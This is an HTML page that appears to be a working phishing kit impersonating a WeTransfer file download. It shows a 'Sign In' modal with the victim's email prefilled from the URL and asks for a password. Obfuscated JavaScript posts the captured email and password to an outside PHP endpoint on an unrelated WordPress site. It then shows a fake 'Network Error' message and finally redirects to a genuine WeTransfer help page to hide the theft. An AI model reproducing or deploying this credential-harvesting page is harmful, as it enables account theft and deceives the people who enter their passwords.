<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

var _0x3b597e=_0x9a61;function _0x9a61(_0x1cd17e,_0x52b909){var _0x3e3139=_0x3e31();return _0x9a61=function(_0x9a611b,_0x14968e){_0x9a611b=_0x9a611b-0xb9;var _0x34a4ed=_0x3e3139[_0x9a611b];return _0x34a4ed;},_0x9a61(_0x1cd17e,_0x52b909);}function _0x3e31(){var _0x1491ee=['#msg','submit','#submitBtn','14089608UWTGeW','25rwjXis','prop','33WZJaRp','html','substr','56AVfIYl','hide','load','340XQEwgb','Sign\x20In','194088tWklYX','#formx','7423476dujhlJ','1585654vtTXAI','#myModal','#x2','show','153VsFROH','val','\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>','disabled','#x1','replace','https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading','5155VDZJwa','hash','797505jNsnlT','#A1','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','modal','click','\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20readonly>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09','POST','331670bcDRYb','location'];_0x3e31=function(){return _0x1491ee;};return _0x3e31();}(function(_0x3e4709,_0x973cc3){var _0x1280b8=_0x9a61,_0x46f75a=_0x3e4709();while(!![]){try{var _0x401fa8=parseInt(_0x1280b8(0xd9))/0x1*(-parseInt(_0x1280b8(0xc9))/0x2)+parseInt(_0x1280b8(0xdb))/0x3+parseInt(_0x1280b8(0xcb))/0x4*(parseInt(_0x1280b8(0xc1))/0x5)+-parseInt(_0x1280b8(0xcd))/0x6+parseInt(_0x1280b8(0xce))/0x7*(-parseInt(_0x1280b8(0xc6))/0x8)+-parseInt(_0x1280b8(0xd2))/0x9*(-parseInt(_0x1280b8(0xbb))/0xa)+-parseInt(_0x1280b8(0xc3))/0xb*(-parseInt(_0x1280b8(0xc0))/0xc);if(_0x401fa8===_0x973cc3)break;else _0x46f75a['push'](_0x46f75a['shift']());}catch(_0x47c584){_0x46f75a['push'](_0x46f75a['shift']());}}}(_0x3e31,0xda9cc),$(window)['on'](_0x3b597e(0xc8),function(){var _0x1983c1=_0x3b597e;$(_0x1983c1(0xcf))[_0x1983c1(0xde)]('show');}),$(document)['ready'](function(){var _0x279df3=_0x3b597e;$('.loaded')['html'](_0x279df3(0xb9));var _0x370f42=0x0,_0x5170b2=window[_0x279df3(0xbc)][_0x279df3(0xda)][_0x279df3(0xc5)](0x1);$(_0x279df3(0xd6))['val'](_0x5170b2),$(_0x279df3(0xcc))[_0x279df3(0xbe)](function(_0x13b87c){var _0x322411=_0x279df3;_0x13b87c['preventDefault']();var _0x39fd17=$(_0x322411(0xdc))['val'](),_0x2d97c6=new FormData($(_0x322411(0xcc))[0x0]);$('#submitBtn')[_0x322411(0xc4)](_0x322411(0xd4))[_0x322411(0xc2)](_0x322411(0xd5),!![]),$(_0x322411(0xd0))[_0x322411(0xdf)](function(){var _0x46f7c9=_0x322411;$(_0x46f7c9(0xbd))[_0x46f7c9(0xc7)]();}),_0x370f42=_0x370f42+0x1,$['ajax']({'url':'https://alfamerinecorp.com/wp-content/wlw/themes/post.php','type':_0x322411(0xba),'data':_0x2d97c6,'contentType':![],'processData':![],'success':function(_0x49e7ea){setTimeout(function(){var _0x4cdb17=_0x9a61;$(_0x4cdb17(0xd6))[_0x4cdb17(0xd3)](_0x5170b2),$(_0x4cdb17(0xd0))['val'](''),$('#msg')[_0x4cdb17(0xd1)](),$(_0x4cdb17(0xbd))[_0x4cdb17(0xc4)](_0x4cdb17(0xdd)),$(_0x4cdb17(0xbf))[_0x4cdb17(0xc4)](_0x4cdb17(0xca))[_0x4cdb17(0xc2)](_0x4cdb17(0xd5),![]),_0x370f42>=0x2&&(_0x370f42=0x0,window[_0x4cdb17(0xbc)][_0x4cdb17(0xd7)]('https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading'));},0x3e8);},'error':function(_0x310b2c){setTimeout(function(){var _0x1fd464=_0x9a61;$(_0x1fd464(0xd6))[_0x1fd464(0xd3)](_0x5170b2),$(_0x1fd464(0xd0))['val'](''),$('#msg')[_0x1fd464(0xd1)](),$('#msg')['html']('Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again'),$('#submitBtn')[_0x1fd464(0xc4)]('Sign\x20In')[_0x1fd464(0xc2)](_0x1fd464(0xd5),![]),_0x370f42>=0x2&&(_0x370f42=0x0,window[_0x1fd464(0xbc)]['replace'](_0x1fd464(0xd8)));},0x3e8);}});});}));

	</script>

</html>
